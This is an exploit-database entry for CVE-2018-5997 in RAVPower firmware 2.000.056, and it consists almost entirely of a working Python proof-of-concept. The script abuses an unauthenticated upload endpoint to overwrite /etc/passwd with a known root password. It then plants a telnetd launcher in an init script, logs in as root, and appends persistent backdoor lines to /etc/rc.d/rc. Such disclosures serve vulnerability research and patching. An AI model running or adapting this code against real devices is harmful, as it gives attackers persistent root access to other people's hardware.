RAVPower 2.000.056 Remote Root Code Execution

2018.01.25
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

""" # Exploit Title: RAVPower - remote root # Date: 23/01/2018 # Exploit Authors: Daniele Linguaglossa # Vendor Homepage: https://www.ravpower.com/ # Software Link: https://www.ravpower.com/ # Version: 2.000.056 # Tested on: OSX # CVE : CVE-2018-5997 """ import requests import time import telnetlib PATH_PASSWD = "/etc" FILE_PASSWD = "passwd" PATH_VSTFUNC = "/etc/init.d" FILE_VSTFUNC = "vstfunc" FILE_RC = "/etc/rc.d/rc" BACKDOOR_TERM = "export TERM=xterm" BACKDOOR_TELNET = "/usr/sbin/telnetd &" BASH_SHEBANG = "#!/bin/sh" TELNETD = "/usr/sbin/telnetd -p 1111 &" def upload(host, port, path, name, content): user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0" path = "/upload.csp?uploadpath=%s&file=1515865637281" % path url ="http://{0}:{1}{2}".format(host,port,path) files = {'file' : ('%s' % name, content,'application/octet-stream')} headers = { "user-agent": user_agent } try: requests.post(url,headers=headers,files=files) return True except: return False # root:admin tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new """ tmp_vstfunc = """ export PATH=/bin:/sbin:/usr/bin:/usr/sbin # A function to stop a program. killproc() { local base=${1##*/} local pid= pid=`pidof $base` local i if [ -n "$pid" ]; then for i in $pid ; do kill -KILL $i > /dev/null 2>&1 done fi rm -f /var/run/$base.pid return 0 } # A function to find the pid of a program. 
pidofproc() { local base=${1##*/} #First try "/var/run/*.pid" files if [ -f "/var/run/$base.pid" ]; then local line p pid= read line < /var/run/$base.pid for p in $line ; do [ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p" done else pid=`pidof $1 || pidof $base` fi if [ -n "$pid" ]; then echo $pid return 0 fi return 1 } # Check if $pid (could be plural) are running # Return : 0 run # 1 stop checkpid() { local i for i in $* ; do if [ -d "/proc/$i" ]; then return 0 fi done return 1 } # Check disk exist checkdisk() { return $? } # save pid and log function savesc() { local i=0 if [ -n "$3" ]; then touch /var/run/$3.pid fi return $? } # A function check start of a program. # return: 1 not exist # 0 exist checkonly() { local prgname=${1##*/} local pid= if [ -f "/var/run/$prgname.pid" ]; then pid=`pidof $prgname` if [ -n "$pid" ]; then return 0 fi return 1 else pid=`pidof $prgname` if [ -n "$pid" ]; then if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then return 2 fi fi return 2 fi } # A function save etc to mtd. # return: 1 failure # 0 success saveetc() { local ret=0 /usr/sbin/etc_tools t > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] /usr/sbin/etc_tools p > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] return $ret } # A function resume mtd to etc. # return: 1 failure # 0 success resumeetc() { local ret=0 /usr/sbin/etc_tools b > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] /usr/sbin/etc_tools u > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] 
return $ret } # Create a lock for /var/lock AppScriptLock() { if [ -f /var/lock/$1.pid ]; then return 0 else touch /var/lock/$1.pid return 1 fi } # Check a lock for /var/lock AppScriptChkLock() { if [ -f /var/lock/$1.pid ]; then return 1 else return 0 fi } # Delete a lock for /var/lock AppScriptUnlock() { if [ -f /var/lock/$1.pid ]; then rm -rf /var/lock/$1.pid fi return 1 } DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade" ETCPATH="/boot/tmp" ETCBKPATH="/boot/tmp/etcbackup" DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar" DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz" ETCFILE="/boot/tmp/etc.tar" ETCBKFILETAR="/boot/tmp/etcbackup.tar" ETCBKFILE="/boot/tmp/etcbackup.tar.gz" FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu" FILELIST1="hostname" backup_etc() { rm $ETCBKFILETAR -rf rm $ETCBKFILE -rf rm $ETCBKPATH -rf # if [ ! -e $DISKPATH ];then # mkdir -p -m 755 $DISKPATH # fi if [ ! -e $ETCBKPATH ]; then mkdir -p -m 755 $ETCBKPATH fi if [ -z $1 ]; then FILELISTALL=$FILELIST else if [ $1 == "resume" ]; then FILELISTALL=$FILELIST1 fi fi for f in $FILELISTALL do if [ -d /etc/$f ]; then cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1 else if [ "$f" == "samba/smbpasswd" ]; then if [ ! -e $ETCBKPATH/samba ]; then mkdir -p $ETCBKPATH/samba fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 elif [ "$f" == "fileserv/lighttpd.user" ]; then if [ ! -e $ETCBKPATH/fileserv ]; then mkdir -p $ETCBKPATH/fileserv fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 elif [ "$f" == "serversman/cloud.conf" ]; then if [ ! -f /etc/$f ]; then continue fi if [ ! 
-e $ETCBKPATH/serversman ]; then mkdir -p $ETCBKPATH/serversman fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 else cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1 fi fi done tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1 gzip $ETCBKFILETAR if [ -f $ETCBKFILE ]; then cp -rf $ETCBKFILE $DIDKETCBKFILE fi } backup_etc_telnet() { rm $ETCBKFILETAR -rf rm $ETCBKFILE -rf rm $ETCBKPATH -rf # if [ ! -e $DISKPATH ];then # mkdir -p -m 755 $DISKPATH # fi if [ ! -e $ETCBKPATH ]; then mkdir -p -m 755 $ETCBKPATH fi if [ -z $1 ]; then FILELISTALL=$FILELIST else if [ $1 == "resume" ]; then FILELISTALL=$FILELIST1 fi fi touch $ETCBKPATH/telnetflag tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1 gzip $ETCBKFILETAR if [ -f $ETCBKFILE ]; then cp -rf $ETCBKFILE $DIDKETCBKFILE fi } restore_etc() { if [ -f $ETCBKFILE ]; then gunzip $ETCBKFILE tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1 for f in $FILELIST do if [ -d /etc/$f ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc #cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1 else if [ "$f" == "samba/smbpasswd" ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 elif [ "$f" == "fileserv/lighttpd.user" ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 elif [ "$f" == "serversman/cloud.conf" ]; then if [ ! 
-f $ETCBKPATH/$f ]; then continue fi echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 else echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 fi fi done if [ -f $ETCBKPATH/telnetflag ]; then touch /etc/telnetflag fi fi } # A function check usb flag # return: 0 service start # 1 service stop check_usb_flag() { local ret=0 if [ -e "/proc/usbwrite" ];then ret=`cat /proc/usbwrite` fi return $ret } ########################################################################### # # LED operations # ########################################################################### led_wink_start() { LED=`cat /proc/vsled` if [ $LED -eq 3 ]; then pioctl wifi 2 fi } led_wink_stop() { LED=`cat /proc/vsled` if [ $LED -eq 2 ]; then pioctl wifi 3 fi } led_wink_chk() { LED=`cat /proc/vsled` if [ $LED -eq 2 ]; then return 1 else return 0 fi } ########################################################################### # # Flag operation # ########################################################################### flagctl_get() { if [ -e /dev/sda ]; then trynum=0 while [ $trynum -lt 3 ]; do retval=`/usr/sbin/flagctl disk get $1` if [ ! -z $retval ]; then return $retval fi let trynum=trynum+1 # trynum=$[$trynum+1] sleep 1 done fi } flagctl_set() { if [ -e /dev/sda ]; then trynum=0 while [ $trynum -lt 3 ]; do /usr/sbin/flagctl disk set $1 $2 flagctl_get $1 if [ "$?" -eq "$2" ]; then sync return 1 fi let trynum=trynum+1 # trynum=$[$trynum+1] sleep 1 done fi return 0 } ########################################################################### # # string function # ########################################################################### str_func_strstr () { if [ ${#2} -eq 0 ];then echo "$1" return 0 fi case "$1" in *$2*) return 1 ;; *) return 0 ;; esac } dev_test_host() { nordev=`echo $1 | cut -c -3` s_str=`ls -l /sys/block/$nordev/device` str_func_strstr "$s_str" "host0" if [ $? 
-eq 1 ]; then return 1 fi return 0; } dev_test_usb() { nordev=`echo $1 | cut -c -3` s_str=`ls -l /sys/block/$nordev/device` str_func_strstr "$s_str" "usb" if [ $? -eq 1 ]; then return 1 fi return 0; } ########################################################################### # # Permission check functions # ########################################################################### # $1: device name # $2: host/usb # $3: if recursive, 1: enable, 0: disable perm_change_start() { permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2` if [ ! -z $permpid ]; then return 1; else /usr/sbin/permchange $1 $2 $3 & fi } # $1: device name # $2: if recursive, 1: enable, 0: disable perm_chk_start() { dev_test_host $1 if [ $? -eq 1 ]; then perm_change_start $1 host $2 else perm_change_start $1 usb $2 fi } perm_chk_stop() { permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2` if [ ! -z $permpid ]; then for ppid in $permpid ; do kill -9 $ppid > /dev/null 2>&1 done fi } ########################################################################### # Time function ########################################################################### timedate_settosys() { if [ -e /etc/timedate ]; then TIMESET=`cat /etc/timedate` date -s $TIMESET fi } timedate_save() { date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate } """ print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n" host = raw_input("Insert Ravpower IP: ") print "[*] Step 1 -> pwning /etc/passwd" if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd): print "[-] Filed to pwn /etc/passwd maybe fixed?" exit(0) print "[*] Step 2 -> pwning /etc/init.d/vstfunc" if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc): print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?" exit(0) t = None print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)" while True: try: print "[*] Step 3-1 -> Trying to telnet..." 
t = telnetlib.Telnet(host, port=1111) break except: time.sleep(5) t.read_until(": ") t.write("root\n") t.read_until(": ") t.write("admin\n") t.read_until("# ") print "[*] Step 4 -> pwning /etc/rc.d/rc" t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC)) t.read_until("# ") t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC)) t.read_until("# ") print "[*] Step 4-1 -> pwned!" print "[*] Step 5 -> Saving settings" t.write("/usr/sbin/etc_tools p\n") t.read_until("# ") print "[*] Step 5-1 -> Done!" print "[*] Step 6 -> Starting telnetd" t.write("/usr/sbin/telnetd &\n") t.read_until("# ") print "[*] Step 6-1 -> Done!" print "[*] Step 7 -> Killing old telnet" t.write("ps aux |grep 1111 | awk '{print $2}' | xargs kill -9\n") t.read_until("# ") print "[*] Step 7-1 -> Done!" print "[*] Step 8 -> Restoring vstfunc" if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc): print "[-] Filed to pwn /etc/init.d/vstfunc fixed?" exit(0) print "[*] Step 8-1 -> Done!" print "[!] PWNAGE COMPLETED! connect with root:admin"

